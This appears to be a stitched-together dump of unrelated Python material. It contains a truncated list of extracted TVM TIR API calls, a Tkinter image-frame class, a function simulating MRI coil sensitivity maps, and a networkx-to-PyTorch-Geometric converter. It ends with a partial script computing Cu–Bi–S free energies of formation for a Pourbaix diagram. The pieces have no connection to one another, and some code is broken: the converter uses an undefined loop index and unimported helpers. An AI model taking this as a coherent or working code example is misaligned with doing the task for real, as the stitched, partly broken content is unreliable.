tvm import tir\n'), ((1661, 1676), 'tvm.tir.bind', 'tir.bind', (['vi', 'i'], {}), '(vi, i)\n', (1669, 1676), False, 'from tvm import tir\n'), ((1689, 1704), 'tvm.tir.bind', 'tir.bind', (['vj', 'j'], {}), '(vj, j)\n', (1697, 1704), False, 'from tvm import tir\n'), ((1717, 1732), 'tvm.tir.bind', 'tir.bind', (['vk', 'k'], {}), '(vk, k)\n', (1725, 1732), False, 'from tvm import tir\n'), ((1745, 1765), 'tvm.tir.bind', 'tir.bind', (['vl', '(l * 16)'], {}), '(vl, l * 16)\n', (1753, 1765), False, 'from tvm import tir\n'), ((2466, 2502), 'tvm.tir.block', 'tir.block', (['[128, 128, 128, 128]', '"""B"""'], {}), "([128, 128, 128, 128], 'B')\n", (2475, 2502), False, 'from tvm import tir\n'), ((2536, 2590), 'tvm.tir.where', 'tir.where', (['(i * 2097152 + j * 16384 + k * 128 + l < 100)'], {}), '(i * 2097152 + j * 16384 + k * 128 + l < 100)\n', (2545, 2590), False, 'from tvm import tir\n'), ((3642, 3668), 'tvm.tir.block', 'tir.block', (['[128, 128]', '"""A"""'], {}), "([128, 128], 'A')\n", (3651, 3668), False, 'from tvm import tir\n'), ((3694, 3709), 'tvm.tir.bind', 'tir.bind', (['vi', 'i'], {}), '(vi, i)\n', (3702, 3709), False, 'from tvm import tir\n'), ((3722, 3737), 'tvm.tir.bind', 'tir.bind', (['vj', 'j'], {}), '(vj, j)\n', (3730, 3737), False, 'from tvm import tir\n'), ((3759, 3777), 'tvm.tir.serial', 'tir.serial', (['(0)', '(128)'], {}), '(0, 128)\n', (3769, 3777), False, 'from tvm import tir\n'), ((4341, 4356), 'tvm.tir.bind', 'tir.bind', (['vi', 'i'], {}), '(vi, i)\n', (4349, 4356), False, 'from tvm import tir\n'), ((4369, 4384), 'tvm.tir.bind', 'tir.bind', (['vj', 'j'], {}), '(vj, j)\n', (4377, 4384), False, 'from tvm import tir\n'), ((4397, 4412), 'tvm.tir.bind', 'tir.bind', (['vk', 'k'], {}), '(vk, k)\n', (4405, 4412), False, 'from tvm import tir\n'), ((4425, 4451), 'tvm.tir.reads', 'tir.reads', (['[A[vi, vj, vk]]'], {}), '([A[vi, vj, vk]])\n', (4434, 4451), False, 'from tvm import tir\n'), ((4464, 4491), 'tvm.tir.writes', 'tir.writes', (['[B[vi, vj, vk]]'], {}), '([B[vi, vj, vk]])\n', (4474, 4491), False, 'from tvm import tir\n'), ((4786, 4822), 'tvm.tir.block', 'tir.block', (['[128, 128, 128, 128]', '"""B"""'], {}), "([128, 128, 128, 128], 'B')\n", (4795, 4822), False, 'from tvm import tir\n'), ((4856, 4871), 'tvm.tir.bind', 'tir.bind', (['vi', 'i'], {}), '(vi, i)\n', (4864, 4871), False, 'from tvm import tir\n'), ((4884, 4899), 'tvm.tir.bind', 'tir.bind', (['vj', 'j'], {}), '(vj, j)\n', (4892, 4899), False, 'from tvm import tir\n'), ((4912, 4927), 'tvm.tir.bind', 'tir.bind', (['vk', 'k'], {}), '(vk, k)\n', (4920, 4927), False, 'from tvm import tir\n'), ((4940, 4955), 'tvm.tir.bind', 'tir.bind', (['vl', 'l'], {}), '(vl, l)\n', (4948, 4955), False, 'from tvm import tir\n'), ((5259, 5295), 'tvm.tir.block', 'tir.block', (['[128, 128, 128, 128]', '"""B"""'], {}), "([128, 128, 128, 128], 'B')\n", (5268, 5295), False, 'from tvm import tir\n'), ((5329, 5344), 'tvm.tir.bind', 'tir.bind', (['vi', 'i'], {}), '(vi, i)\n', (5337, 5344), False, 'from tvm import tir\n'), ((5357, 5372), 'tvm.tir.bind', 'tir.bind', (['vj', 'j'], {}), '(vj, j)\n', (5365, 5372), False, 'from tvm import tir\n'), ((5385, 5400), 'tvm.tir.bind', 'tir.bind', (['vk', 'k'], {}), '(vk, k)\n', (5393, 5400), False, 'from tvm import tir\n'), ((5413, 5428), 'tvm.tir.bind', 'tir.bind', (['vl', 'l'], {}), '(vl, l)\n', (5421, 5428), False, 'from tvm import tir\n'), ((5746, 5782), 'tvm.tir.block', 'tir.block', (['[128, 128, 128, 128]', '"""B"""'], {}), "([128, 128, 128, 128], 'B')\n", (5755, 5782), False, 'from tvm import tir\n'), ((5816, 5870), 'tvm.tir.where', 'tir.where', (['(i * 2097152 + j * 16384 + k * 128 + l < 100)'], {}), '(i * 2097152 + j * 16384 + k * 128 + l < 100)\n', (5825, 5870), False, 'from tvm import tir\n'), ((5883, 5898), 'tvm.tir.bind', 'tir.bind', (['vi', 'i'], {}), '(vi, i)\n', (5891, 5898), False, 'from tvm import tir\n'), ((5911, 5926), 'tvm.tir.bind', 'tir.bind', (['vj', 'j'], {}), '(vj, j)\n', (5919, 5926), False, 'from tvm import tir\n'), ((5939, 5954), 'tvm.tir.bind', 'tir.bind', (['vk', 'k'], {}), '(vk, k)\n', (5947, 5954), False, 'from tvm import tir\n'), ((5967, 5982), 'tvm.tir.bind', 'tir.bind', (['vl', 'l'], {}), '(vl, l)\n', (5975, 5982), False, 'from tvm import tir\n'), ((6484, 6558), 'tvm.tir.tvm_fill_fragment', 'tir.tvm_fill_fragment', (['B.data', '(16)', '(16)', '(16)', '(0)', '(vi * 16 + vj)'], {'dtype': '"""handle"""'}), "(B.data, 16, 16, 16, 0, vi * 16 + vj, dtype='handle')\n", (6505, 6558), False, 'from tvm import tir\n'), ((6786, 6810), 'tvm.tir.block', 'tir.block', (['[16, 16]', '"""A"""'], {}), "([16, 16], 'A')\n", (6795, 6810), False, 'from tvm import tir\n'), ((6836, 6851), 'tvm.tir.bind', 'tir.bind', (['vi', 'i'], {}), '(vi, i)\n', (6844, 6851), False, 'from tvm import tir\n'), ((6864, 6879), 'tvm.tir.bind', 'tir.bind', (['vj', 'j'], {}), '(vj, j)\n', (6872, 6879), False, 'from tvm import tir\n'), ((6892, 6905), 'tvm.tir.reads', 'tir.reads', (['[]'], {}), '([])\n', (6901, 6905), False, 'from tvm import tir\n'), ((6918, 6945), 'tvm.tir.writes', 'tir.writes', (['[A[0:16, 0:16]]'], {}), '([A[0:16, 0:16]])\n', (6928, 6945), False, 'from tvm import tir\n'), ((6958, 6992), 'tvm.tir.store', 'tir.store', (['A.data', '(vi * 16 + vj)', '(1)'], {}), '(A.data, vi * 16 + vj, 1)\n', (6967, 6992), False, 'from tvm import tir\n'), ((7040, 7064), 'tvm.tir.block', 'tir.block', (['[16, 16]', '"""B"""'], {}), "([16, 16], 'B')\n", (7049, 7064), False, 'from tvm import tir\n'), ((7090, 7105), 'tvm.tir.bind', 'tir.bind', (['vi', 'i'], {}), '(vi, i)\n', (7098, 7105), False, 'from tvm import tir\n'), ((7118, 7133), 'tvm.tir.bind', 'tir.bind', (['vj', 'j'], {}), '(vj, j)\n', (7126, 7133), False, 'from tvm import tir\n'), ((7146, 7159), 'tvm.tir.reads', 'tir.reads', (['[]'], {}), '([])\n', (7155, 7159), False, 'from tvm import tir\n'), ((7172, 7199), 'tvm.tir.writes', 'tir.writes', (['[B[0:16, 0:16]]'], {}), '([B[0:16, 0:16]])\n', (7182, 7199), False, 'from tvm import tir\n'), ((2104, 2138), 'tvm.tir.block', 'tir.block', (['[128, 128, i, 128]', '"""B"""'], {}), "([128, 128, i, 128], 'B')\n", (2113, 2138), False, 'from tvm import tir\n'), ((2958, 2989), 'tvm.tir.block', 'tir.block', (['[128, 128, 128]', '"""C"""'], {}), "([128, 128, 128], 'C')\n", (2967, 2989), False, 'from tvm import tir\n'), ((3023, 3038), 'tvm.tir.bind', 'tir.bind', (['vi', 'i'], {}), '(vi, i)\n', (3031, 3038), False, 'from tvm import tir\n'), ((3055, 3070), 'tvm.tir.bind', 'tir.bind', (['vj', 'j'], {}), '(vj, j)\n', (3063, 3070), False, 'from tvm import tir\n'), ((3087, 3102), 'tvm.tir.bind', 'tir.bind', (['vk', 'k'], {}), '(vk, k)\n', (3095, 3102), False, 'from tvm import tir\n'), ((3209, 3240), 'tvm.tir.block', 'tir.block', (['[128, 128, 128]', '"""B"""'], {}), "([128, 128, 128], 'B')\n", (3218, 3240), False, 'from tvm import tir\n'), ((3274, 3289), 'tvm.tir.bind', 'tir.bind', (['vi', 'i'], {}), '(vi, i)\n', (3282, 3289), False, 'from tvm import tir\n'), ((3306, 3321), 'tvm.tir.bind', 'tir.bind', (['vj', 'j'], {}), '(vj, j)\n', (3314, 3321), False, 'from tvm import tir\n'), ((3338, 3353), 'tvm.tir.bind', 'tir.bind', (['vk', 'k'], {}), '(vk, k)\n', (3346, 3353), False, 'from tvm import tir\n'), ((7225, 7299), 'tvm.tir.tvm_fill_fragment', 'tir.tvm_fill_fragment', (['B.data', '(16)', '(16)', '(16)', '(0)', '(vi * 16 + vj)'], {'dtype': '"""handle"""'}), "(B.data, 16, 16, 16, 0, vi * 16 + vj, dtype='handle')\n", (7246, 7299), False, 'from tvm import tir\n'), ((3800, 3821), 'tvm.tir.block', 'tir.block', (['[128]', '"""B"""'], {}), "([128], 'B')\n", (3809, 3821), False, 'from tvm import tir\n'), ((3851, 3866), 'tvm.tir.bind', 'tir.bind', (['vk', 'k'], {}), '(vk, k)\n', (3859, 3866), False, 'from tvm import tir\n'), ((3887, 3913), 'tvm.tir.reads', 'tir.reads', (['[A[vi, vj, vk]]'], {}), '([A[vi, vj, vk]])\n', (3896, 3913), False, 'from tvm import tir\n'), ((3934, 3961), 'tvm.tir.writes', 'tir.writes', (['[B[vi, vj, vk]]'], {}), '([B[vi, vj, vk]])\n', (3944, 3961), False, 'from tvm import tir\n'), ((4283, 4304), 'tvm.tir.scan_axis', 'tir.scan_axis', (['(0)', '(128)'], {}), '(0, 128)\n', (4296, 4304), False, 'from tvm import tir\n')]
|
import tkinter as tk
from PIL import ImageTk, Image
from Pages.MusicPage.Components.TextFrame import TextFrame
class Head(tk.Frame):
def __init__(self, master, image, text, data, *args, **kwargs):
tk.Frame.__init__(self, master, *args, *kwargs)
self['background'] = 'black'
self.photo = image
self.count = 0
self.image_frame = tk.Frame(self, bg='#000000')
self.image_frame.bind('<Configure>', self.frame_size)
self.text_frame = TextFrame(self, text, data)
self.image_label = tk.Canvas(self.image_frame,
bd=0,
highlightthickness=0)
self.image_label.grid(row=0,
column=0,
sticky='nsew', )
self.image_label.bind('<Configure>', self.label_size)
self.image_frame.grid_columnconfigure(0, weight=1)
self.image_frame.grid_rowconfigure(0, weight=1)
self.image_frame.grid(row=0, column=0, sticky='nsew', padx=(30, 0), pady=30)
self.text_frame.grid(row=0, column=1, sticky='nsew', padx=(10, 0), pady=(30, 30))
self.grid_rowconfigure(0, weight=1)
self.grid_columnconfigure(0, weight=1)
self.grid_columnconfigure(1, weight=10000)
def frame_size(self, event):
pass
def label_size(self, event):
if self.count == 0:
width = int(round(event.width / 1.5))
height = int(round(event.height / 2))
self.photo = self.photo.resize((height, height),
Image.ANTIALIAS)
self.photo = ImageTk.PhotoImage(self.photo)
self.image_label.config(width=width, height=height)
self.image_label.create_image(0, 0,
image=self.photo,
anchor=tk.NW,
tags="IMG")
self.image_label.configure(width=height)
self.count = 1
|
[
"PIL.ImageTk.PhotoImage",
"tkinter.Canvas",
"tkinter.Frame.__init__",
"Pages.MusicPage.Components.TextFrame.TextFrame",
"tkinter.Frame"
] |
[((211, 258), 'tkinter.Frame.__init__', 'tk.Frame.__init__', (['self', 'master', '*args', '*kwargs'], {}), '(self, master, *args, *kwargs)\n', (228, 258), True, 'import tkinter as tk\n'), ((374, 402), 'tkinter.Frame', 'tk.Frame', (['self'], {'bg': '"""#000000"""'}), "(self, bg='#000000')\n", (382, 402), True, 'import tkinter as tk\n'), ((492, 519), 'Pages.MusicPage.Components.TextFrame.TextFrame', 'TextFrame', (['self', 'text', 'data'], {}), '(self, text, data)\n', (501, 519), False, 'from Pages.MusicPage.Components.TextFrame import TextFrame\n'), ((548, 603), 'tkinter.Canvas', 'tk.Canvas', (['self.image_frame'], {'bd': '(0)', 'highlightthickness': '(0)'}), '(self.image_frame, bd=0, highlightthickness=0)\n', (557, 603), True, 'import tkinter as tk\n'), ((1654, 1684), 'PIL.ImageTk.PhotoImage', 'ImageTk.PhotoImage', (['self.photo'], {}), '(self.photo)\n', (1672, 1684), False, 'from PIL import ImageTk, Image\n')]
|
# coding=utf-8
# Copyright (c) DIRECT Contributors
from typing import List, Optional, Tuple, Union
import numpy as np
from scipy.stats import multivariate_normal as normal
def simulate_sensitivity_maps(
shape: Union[List[int], Tuple[int]], num_coils: int, var: float = 1, seed: Optional[int] = None
) -> np.ndarray:
r"""Simulates coil sensitivities using bi-variate or tri-variate gaussian distribution.
Parameters
----------
shape: List[int] or Tuple[int]
(nx, ny) or (nx, ny, nz).
num_coils: int
Number of coils to be simulated.
var: float
Variance.
seed: int or None
If not None, a seed will be used to produce an offset for the gaussian mean :math:`\mu`.
Returns
-------
sensitivity_map : nd.array
Simulated coil sensitivity maps of shape (num_coils, \*shape).
Notes
-----
Sensitivity maps are normalized such that:
.. math::
\sum_{k=1}^{n_c} {S^{k}}^{*}S^{k} = I.
"""
if num_coils == 1:
return np.ones(shape)[None] + 0.0j
# X, Y are switched in np.meshgrid
meshgrid = np.meshgrid(*[np.linspace(-1, 1, n) for n in shape[:2][::-1] + shape[2:]])
indices = np.stack(meshgrid, axis=-1)
sensitivity_map = np.zeros((num_coils, *shape))
# Assume iid
cov = np.zeros(len(shape))
for ii in range(len(shape)):
cov[ii] = var
cov = np.diag(cov)
if seed:
np.random.seed(seed)
offset = np.random.uniform(0, 2 * np.pi, 1)
for coil_idx in range(num_coils):
mu = [
np.cos(coil_idx / num_coils * 2 * np.pi + offset).item(),
np.sin(coil_idx / num_coils * 2 * np.pi + offset).item(),
]
if len(shape) == 3:
mu += [0.0]
sensitivity_map[coil_idx] = normal(mu, cov).pdf(indices)
sensitivity_map = sensitivity_map + 1.0j * sensitivity_map # make complex
# Normalize
sensitivity_map_norm = np.sqrt((np.conj(sensitivity_map) * sensitivity_map).sum(0))[None]
sensitivity_map = sensitivity_map / sensitivity_map_norm
return sensitivity_map
|
[
"numpy.stack",
"numpy.random.uniform",
"numpy.conj",
"numpy.random.seed",
"numpy.zeros",
"numpy.ones",
"scipy.stats.multivariate_normal",
"numpy.sin",
"numpy.linspace",
"numpy.cos",
"numpy.diag"
] |
[((1211, 1238), 'numpy.stack', 'np.stack', (['meshgrid'], {'axis': '(-1)'}), '(meshgrid, axis=-1)\n', (1219, 1238), True, 'import numpy as np\n'), ((1262, 1291), 'numpy.zeros', 'np.zeros', (['(num_coils, *shape)'], {}), '((num_coils, *shape))\n', (1270, 1291), True, 'import numpy as np\n'), ((1405, 1417), 'numpy.diag', 'np.diag', (['cov'], {}), '(cov)\n', (1412, 1417), True, 'import numpy as np\n'), ((1473, 1507), 'numpy.random.uniform', 'np.random.uniform', (['(0)', '(2 * np.pi)', '(1)'], {}), '(0, 2 * np.pi, 1)\n', (1490, 1507), True, 'import numpy as np\n'), ((1439, 1459), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (1453, 1459), True, 'import numpy as np\n'), ((1040, 1054), 'numpy.ones', 'np.ones', (['shape'], {}), '(shape)\n', (1047, 1054), True, 'import numpy as np\n'), ((1136, 1157), 'numpy.linspace', 'np.linspace', (['(-1)', '(1)', 'n'], {}), '(-1, 1, n)\n', (1147, 1157), True, 'import numpy as np\n'), ((1799, 1814), 'scipy.stats.multivariate_normal', 'normal', (['mu', 'cov'], {}), '(mu, cov)\n', (1805, 1814), True, 'from scipy.stats import multivariate_normal as normal\n'), ((1573, 1622), 'numpy.cos', 'np.cos', (['(coil_idx / num_coils * 2 * np.pi + offset)'], {}), '(coil_idx / num_coils * 2 * np.pi + offset)\n', (1579, 1622), True, 'import numpy as np\n'), ((1643, 1692), 'numpy.sin', 'np.sin', (['(coil_idx / num_coils * 2 * np.pi + offset)'], {}), '(coil_idx / num_coils * 2 * np.pi + offset)\n', (1649, 1692), True, 'import numpy as np\n'), ((1960, 1984), 'numpy.conj', 'np.conj', (['sensitivity_map'], {}), '(sensitivity_map)\n', (1967, 1984), True, 'import numpy as np\n')]
|
import torch
def nx_to_tg(g, node_features=None, edge_features=None, convert_edges=True):
node_features = node_features or []
edge_features = edge_features or []
n_nodes = g.number_of_nodes()
nodes = torch.zeros(n_nodes, len(node_features), dtype=torch.float)
for n, data in g.nodes(data=True):
for j, feature in enumerate(node_features):
nodes[i][j] = data[feature]
n_edges = g.number_of_edges()
edges = torch.zeros(n_edges, 2, dtype=torch.long)
edge_attrs = torch.zeros(n_edges, len(edge_features), dtype=torch.long)
if convert_edges:
for i, edge in enumerate(g.edges):
u, v = edge
edges[i][0], edges[i][1] = u, v
for j, feature in enumerate(edge_features):
edge_attrs[i][j] = g.edges[edge][feature]
if n_edges > 0:
edges = edges.t()
edges = to_undirected(edges)
return Data(x=nodes, edge_attr=edge_attrs, edge_index=edges.contiguous())
|
[
"torch.zeros"
] |
[((456, 497), 'torch.zeros', 'torch.zeros', (['n_edges', '(2)'], {'dtype': 'torch.long'}), '(n_edges, 2, dtype=torch.long)\n', (467, 497), False, 'import torch\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 23 13:17:41 2018
@author: laurenwalters
"""
import numpy as np
import matplotlib.pyplot as plt
import random
#For saving/importing data
from numpy import asarray
from numpy import save
from numpy import load
#Created by <NAME>, 2018-2020
#Contributions by <NAME>
#For reactions in aqueous conditions
#find out how much detail you want in your graph
#n=input("Enter the mesh grid detail you want, suggested (30-140): ")
n=30;
#Constants
R=8.31447; #kJ/(mol*K)
T=298.15; #K
F= 9.648533*10**4; #kJ/(V*mol)
P=1; #bar, 10^5*Pa
eta=6
nI=10**-eta; #Activity Concentration
#Array showing the composition of Cu:Bi:S
composition=np.array([1,1,1])
#pH Range and Constants
lowpH = -2;
highpH = 16;
pHrange = int;
pHrange = highpH-lowpH;
pHcount = pHrange/n; #used to iterate through pH range
#Applied Potential Range and Constants
Ulow = -1.5; #V
Uhigh = 1.5; #V
Urange = Uhigh-Ulow; #V
Ucount = Urange/n; #used to iterate through U (energy) range
###############################################################################
######################## DFT CALCULATIONS #####################################
###############################################################################
#Electronic Energies in eV/f.u.
#PBEsol with SOC
Ee_Bi= -5.114928333;
Ee_Bi2O3= -31.163316;
Ee_Bi2O5= -40.1344765;
Ee_Bi2O4=-36.7221975;
Ee_Bi4O7=-68.40888;
#PBEsol
Ee_Cu=-4.3152965;
Ee_CuO=-10.7488868;
Ee_Cu2O=-14.99698;
Ee_CuOH2_s=-25.1916025;
#PBEsol
Ee_O2=-10.281123
Ee_H2=-6.5141508
Ee_S= -4.391811875;
###############################################################################
########### MULTICOMPONENT SPECIES ############################################
#Calculated with PBEsol
Ee_Cu2S=-13.4793116667;
Ee_Cu7S4=-49.8241325;
Ee_CuS=-9.170266;
Ee_CuS2=-13.63935;
Ee_Cu2SO4_3=-101.5166;
Ee_BiCu=-9.31218;
Ee_CuBiO2_2=-42.245475;
Ee_BiS2=-14.6172585;
Ee_Bi2S3=-24.878388;
Ee_Bi2S2O=-27.2327565;
Ee_Bi2SO4_3=-109.35902;
Ee_Bi14OS24=-247.57619;
Ee_Bi2SO2=-29.50652;
Ee_BiSCuO=-21.5022935;
Ee_Cu3BiS3=-32.4713275;
Ee_Cu4Bi4S9=-80.830705;
Ee_Cu4BiS2_5=-90.647798;
Ee_CuBiS2=-19.041996;
###############################################################################
###### Vibrational Energy #####################################################
###############################################################################
#Vibrational Energies in eV/f.u.
#From PBEsol Phonon Calculations
Fvib_O2=-0.272;
F_rot_trans_O2=0.099;
Ftot_O2=Fvib_O2+F_rot_trans_O2;
F_H = .202;
Fvib_S=-0.0091266451372
Fvib_CuO=0.062498987735
Fvib_Cu2O=0.00507624852
Fvib_Cu=-0.007167374680
Fvib_CuOH2_s=0.66653026525
Fvib_Bi=-0.0761976993239
Fvib_Bi2O3=-0.057653546889
Fvib_Bi2O5=0.14677315404
Fvib_Bi2O4=0.12231438709
Fvib_Bi4O7=0.08741679245
Fvib_Cu2S=-0.0050937891364
Fvib_Cu7S4=-0.178002185722
Fvib_CuS=-0.0119849701814
Fvib_CuS2=-0.0033060080158
Fvib_Cu2SO4_3=1.00135494361
Fvib_BiCu=-0.11006963132
Fvib_CuBiO2_2=0.09853363658
Fvib_BiS2=-0.063943629448
Fvib_Bi2S3=-0.1428187610337
Fvib_Bi2S2O=-0.08193190191
Fvib_Bi2SO4_3=0.81266278392
Fvib_Bi14OS24=0.02990373431
Fvib_Bi2SO2=-0.0265520338422
Fvib_BiSCuO=-0.039894146059
Fvib_Cu3BiS3=-0.1661179102334
Fvib_Cu4Bi4S9=-0.3270592722135
Fvib_Cu4BiS2_5=-0.430548296696
Fvib_CuBiS2=-0.08663072302
###############################################################################
### Compounds-Calculate the formation energies ############################
###############################################################################
#Free Energies of Formation in eV/f.u.
dGf_CuO= (Ee_CuO+Fvib_CuO) -(Ee_Cu+Fvib_Cu) - 0.5*(Ee_O2+Ftot_O2);
dGf_Cu2O=(Ee_Cu2O+Fvib_Cu2O) -2.0*(Ee_Cu+Fvib_Cu) - 0.5*(Ee_O2+Ftot_O2);
dGf_CuOH2_s= (Ee_CuOH2_s+Fvib_CuOH2_s) -(Ee_Cu+Fvib_Cu)-(Ee_O2+Ftot_O2)-(Ee_H2+F_H);
dGf_Bi2O3= ((Ee_Bi2O3)+Fvib_Bi2O3) -2.0*(Ee_Bi+Fvib_Bi)-1.5*(Ee_O2-Ftot_O2);
dGf_Bi2O5= ((Ee_Bi2O5)+Fvib_Bi2O5) -2.0*(Ee_Bi+Fvib_Bi)-2.5*(Ee_O2-Ftot_O2);
dGf_Bi2O4= ((Ee_Bi2O4)+Fvib_Bi2O4) -2.0*(Ee_Bi+Fvib_Bi)-2.0*(Ee_O2-Ftot_O2);
dGf_Bi4O7= ((Ee_Bi4O7)+Fvib_Bi4O7) -4.0*(Ee_Bi+Fvib_Bi)-3.5*(Ee_O2-Ftot_O2);
dGf_Cu2S=(Ee_Cu2S+Fvib_Cu2S) -2*(Ee_Cu+Fvib_Cu)-(Ee_S+Fvib_S);
dGf_Cu7S4=(Ee_Cu7S4+Fvib_Cu7S4) -7*(Ee_Cu+Fvib_Cu)-4*(Ee_S+Fvib_S);
dGf_CuS=(Ee_CuS+Fvib_CuS) -(Ee_Cu+Fvib_Cu)-(Ee_S+Fvib_S);
dGf_CuS2=(Ee_CuS2+Fvib_CuS2) -(Ee_Cu+Fvib_Cu)-2*(Ee_S+Fvib_S);
dGf_Cu2SO4_3=(Ee_Cu2SO4_3+Fvib_Cu2SO4_3) -2*(Ee_Cu+Fvib_Cu)-3*(Ee_S+Fvib_S)-6.0*((Ee_O2)-Ftot_O2);
dGf_BiCu=(Ee_BiCu+Fvib_BiCu) -(Ee_Cu+Fvib_Cu)-(Ee_Bi+Fvib_Bi);
dGf_CuBiO2_2=(Ee_CuBiO2_2+Fvib_CuBiO2_2) -(Ee_Cu+Fvib_Cu)-2*(Ee_Bi+Fvib_Bi)-2.0*((Ee_O2)-Ftot_O2);
dGf_BiS2=(Ee_BiS2+Fvib_BiS2) -(Ee_Bi+Fvib_Bi)-2*(Ee_S+Fvib_S);
dGf_Bi2S3=(Ee_Bi2S3+Fvib_Bi2S3) -2*(Ee_Bi+Fvib_Bi)-3*(Ee_S+Fvib_S);
dGf_Bi2S2O=(Ee_Bi2S2O+Fvib_Bi2S2O) -2*(Ee_Bi+Fvib_Bi)-2*(Ee_S+Fvib_S)-0.5*((Ee_O2)-Ftot_O2);
dGf_Bi2SO4_3=(Ee_Bi2SO4_3+Fvib_Bi2SO4_3) -2*(Ee_Bi+Fvib_Bi)-3*(Ee_S+Fvib_S)-6.0*((Ee_O2)-Ftot_O2);
dGf_Bi14OS24=(Ee_Bi14OS24+Fvib_Bi14OS24) -14*(Ee_Bi+Fvib_Bi)-24*(Ee_S+Fvib_S)-0.5*((Ee_O2)-Ftot_O2);
dGf_Bi2SO2=(Ee_Bi2SO2+Fvib_Bi2SO2) -2*(Ee_Bi+Fvib_Bi)-(Ee_S+Fvib_S)-1.0*((Ee_O2)-Ftot_O2);
dGf_BiSCuO=(Ee_BiSCuO+Fvib_BiSCuO) -(Ee_Cu+Fvib_Cu)-(Ee_Bi+Fvib_Bi)-(Ee_S+Fvib_S)-0.5*((Ee_O2)-Ftot_O2);
dGf_Cu3BiS3=(Ee_Cu3BiS3+Fvib_Cu3BiS3) -3*(Ee_Cu+Fvib_Cu)-(Ee_Bi+Fvib_Bi)-3*(Ee_S+Fvib_S);
dGf_Cu4Bi4S9=(Ee_Cu4Bi4S9+Fvib_Cu4Bi4S9) -4*(Ee_Cu+Fvib_Cu)-4*(Ee_Bi+Fvib_Bi)-9*(Ee_S+Fvib_S);
dGf_Cu4BiS2_5=(Ee_Cu4BiS2_5+Fvib_Cu4BiS2_5)-4*(Ee_Cu+Fvib_Cu)-5*(Ee_Bi+Fvib_Bi)-10*(Ee_S+Fvib_S);
dGf_CuBiS2=(Ee_CuBiS2+Fvib_CuBiS2) -(Ee_Cu+Fvib_Cu)-(Ee_Bi+Fvib_Bi)-2*(Ee_S+Fvib_S);
#Set the reference values
dGf_Cu=0.0;
dGf_Bi=0.0;
dGf_S=0.0;
###############################################################################
###############################################################################
###############################################################################
###############################################################################
############## Aqueous Ion Free Energies of Formation #########################
#Free Energies of Formation in eV/f.u.
##Elemental Bismuth Species
dGf_Bi_3Plus= 0.6430898
dGf_BiOH_2Plus= -1.6968378
dGf_BiO_Plus= -1.4977965
##Elemental Copper Species
dGf_Cu1= 0.506502
dGf_Cu2= 0.674092
dGf_CuOH2_minus= -3.4518209
dGf_CuOH3= -5.1197432
dGf_CuOH_Plus= -1.3127387
dGf_CuOH4_2=-6.814302
dGf_CuOH2= -3.2666113
dGf_CuOH = -1.2677578
dGf_Cu2OH2_2plus=-2.942417
dGf_Cu3OH4_2plus=-6.567839
#Elemental Sulphur Species
dGf_H2S=-0.283601
dGf_HS_Minus=0.13053
dGf_S_2Minus=0.9521892
dGf_S2_2Minus=0.8563979
dGf_S3_2Minus=0.7791664
dGf_S4_2Minus=0.7204948
dGf_S5_2Minus=0.6803396
dGf_H2S2O3=-5.6329986
dGf_HS2O3_Minus=-5.6156529
dGf_S2O3_2Minus=-5.515915
dGf_S5O6_2Minus=-9.9087
dGf_S4O6_2Minus=-10.5939
dGf_HS2O4_Minus=-6.13203282
dGf_S2O4_2Minus=-5.9842
dGf_S3O6_2Minus=-9.930382
dGf_H2SO3=-5.580528
dGf_HSO3_Minus=-5.464
dGf_SO3_2Minus=-5.03457
dGf_S2O6_2Minus=-10.02
dGf_H2SO4=-7.6901922
dGf_HSO4_Minus=-7.8029389
dGf_SO4_2Minus=-7.6901922
dGf_S2O8_2Minus=-11.361
dGf_HSO5_Minus= -6.60739025
dGf_S2O5_2Minus= -8.195817793
#Water
dGf_H2O=-2.458;
###############################################################################
###############################################################################
###############################################################################
################################################################################
############# CONVERT from eV to kJ/mol ####################################
###############################################################################
dGf_Cu= dGf_Cu*F;
dGf_CuO= dGf_CuO*F;
dGf_Cu2O= dGf_Cu2O*F;
dGf_Cu1= dGf_Cu1*F;
dGf_Cu2= dGf_Cu2*F;
dGf_CuOH4_2= dGf_CuOH4_2*F;
dGf_CuOH2_minus= dGf_CuOH2_minus*F;
dGf_CuOH3= dGf_CuOH3*F;
dGf_CuOH_Plus= dGf_CuOH_Plus*F;
dGf_CuOH2= dGf_CuOH2*F;
dGf_CuOH = dGf_CuOH*F;
dGf_Cu2OH2_2plus=dGf_Cu2OH2_2plus*F;
dGf_Cu3OH4_2plus=dGf_Cu3OH4_2plus*F;
dGf_CuOH2_s=dGf_CuOH2_s*F
dGf_Bi= dGf_Bi*F;
dGf_Bi2O3= dGf_Bi2O3*F;
dGf_Bi2O5= dGf_Bi2O5*F;
dGf_Bi2O4=dGf_Bi2O4*F;
dGf_Bi4O7=dGf_Bi4O7*F;
dGf_Bi_3Plus= dGf_Bi_3Plus*F;
dGf_BiOH_2Plus= dGf_BiOH_2Plus*F;
dGf_BiO_Plus= dGf_BiO_Plus*F;
dGf_S= dGf_S*F;
dGf_H2S=dGf_H2S*F;
dGf_HS_Minus=dGf_HS_Minus*F;
dGf_S_2Minus=dGf_S_2Minus*F;
dGf_S2_2Minus=dGf_S2_2Minus*F;
dGf_S3_2Minus=dGf_S3_2Minus*F;
dGf_S4_2Minus=dGf_S4_2Minus*F;
dGf_S5_2Minus=dGf_S5_2Minus*F;
dGf_H2S2O3=dGf_H2S2O3*F;
dGf_HS2O3_Minus=dGf_HS2O3_Minus*F;
dGf_S2O3_2Minus=dGf_S2O3_2Minus*F;
dGf_S5O6_2Minus=dGf_S5O6_2Minus*F;
dGf_S4O6_2Minus=dGf_S4O6_2Minus*F;
dGf_HS2O4_Minus=dGf_HS2O4_Minus*F;
dGf_S2O4_2Minus=dGf_S2O4_2Minus*F;
dGf_S3O6_2Minus=dGf_S3O6_2Minus*F;
dGf_H2SO3=dGf_H2SO3*F;
dGf_HSO3_Minus=dGf_HSO3_Minus*F;
dGf_SO3_2Minus=dGf_SO3_2Minus*F;
dGf_S2O6_2Minus=dGf_S2O6_2Minus*F;
dGf_H2SO4=dGf_H2SO4*F;
dGf_HSO4_Minus=dGf_HSO4_Minus*F;
dGf_SO4_2Minus=dGf_SO4_2Minus*F;
dGf_S2O8_2Minus=dGf_S2O8_2Minus*F;
dGf_HSO5_Minus=dGf_HSO5_Minus*F;
dGf_S2O5_2Minus=dGf_S2O5_2Minus*F;
dGf_Cu2S=dGf_Cu2S*F;
dGf_Cu7S4=dGf_Cu7S4*F;
dGf_CuS=dGf_CuS*F;
dGf_CuS2=dGf_CuS2*F;
